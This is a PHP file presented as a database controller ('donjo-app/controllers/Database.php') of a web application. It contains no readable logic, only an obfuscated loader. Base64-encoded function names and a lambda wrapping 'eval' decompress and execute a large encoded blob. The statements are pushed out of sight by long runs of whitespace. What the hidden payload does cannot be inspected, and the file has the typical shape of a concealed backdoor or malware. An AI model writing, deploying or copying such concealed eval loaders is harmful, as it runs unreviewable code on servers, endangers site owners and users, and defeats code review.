<?php 
        $__='printf';$_='Loading donjo-app/controllers/Database.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
